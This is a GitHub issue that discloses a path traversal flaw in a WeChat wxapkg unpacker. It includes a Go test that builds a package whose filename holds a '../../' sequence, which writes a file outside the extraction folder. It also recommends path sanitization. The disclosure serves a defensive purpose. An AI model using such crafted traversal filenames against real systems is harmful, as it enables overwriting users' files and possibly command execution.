Malicious wxapkg File Leading to Arbitrary File Write and Command Execution

**Vulnerability Report: Malicious `wxapkg` File Leading to Arbitrary File Write and Command Execution**

**Summary:**

A vulnerability was discovered in the handling of `wxapkg` files (WeChat Mini Program package format). By crafting a malicious `wxapkg` file, an attacker can exploit improper validation during package parsing and extraction. This leads to arbitrary file write on the host file system and can be further escalated to remote command execution under certain conditions.

**Vulnerability Details:**

* **Affected Component**: `wxapkg` file parsing and extraction logic
* **Type of Vulnerability**: Arbitrary File Write, Command Execution
* **Attack Vector**: Malicious `wxapkg` file

**Proof of Concept (PoC):**

A proof-of-concept `wxapkg` file was crafted containing:
```go
package unpack

import (
	"bytes"
	"encoding/binary"
	"testing"
)

func createTestWxapkg() []byte {
	var buf bytes.Buffer

	// header
	buf.WriteByte(0xBE)

	binary.Write(&buf, binary.BigEndian, uint32(0))

	indexLenPos := buf.Len()
	binary.Write(&buf, binary.BigEndian, uint32(0)) // indexInfoLength
	binary.Write(&buf, binary.BigEndian, uint32(0)) // bodyInfoLength

	buf.WriteByte(0xED)

	// files
	// files number
	binary.Write(&buf, binary.BigEndian, uint32(1))

	indexStart := buf.Len()

	filename := "../../../../../../../../Users/whoami/Desktop/zznq.txt"
	fileContent := []byte("zznq todo")

	binary.Write(&buf, binary.BigEndian, uint32(len(filename)))
	buf.WriteString(filename)

	dataOffsetPos := buf.Len()
	binary.Write(&buf, binary.BigEndian, uint32(0))
	binary.Write(&buf, binary.BigEndian, uint32(len(fileContent)))

	b := buf.Bytes()
	binary.BigEndian.PutUint32(b[indexLenPos:], uint32(buf.Len()-indexStart))
	binary.BigEndian.PutUint32(b[indexLenPos+4:], uint32(len(fileContent)))

	// data body
	fileDataPos := buf.Len()
	buf.Write(fileContent)

	b = buf.Bytes()
	binary.BigEndian.PutUint32(b[dataOffsetPos:], uint32(fileDataPos))

	return buf.Bytes()
}

func TestUnPack(t *testing.T) {
	data := createTestWxapkg()
	t.Log(UnpackWxapkg(data, "./"))
}
```

![Image](https://github.com/user-attachments/assets/604c3ac2-da6f-400f-ae58-603cb0408107)

**Recommendations:**

* Implement strict path sanitization when extracting `wxapkg` files：[unpack.go#L179](https://github.com/Ackites/KillWxapkg/blob/master/internal/unpack/unpack.go#L179)

**Severity: Critical**


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Malicious wxapkg File Leading to Arbitrary File Write and Command Execution #85

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Malicious wxapkg File Leading to Arbitrary File Write and Command Execution #85

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions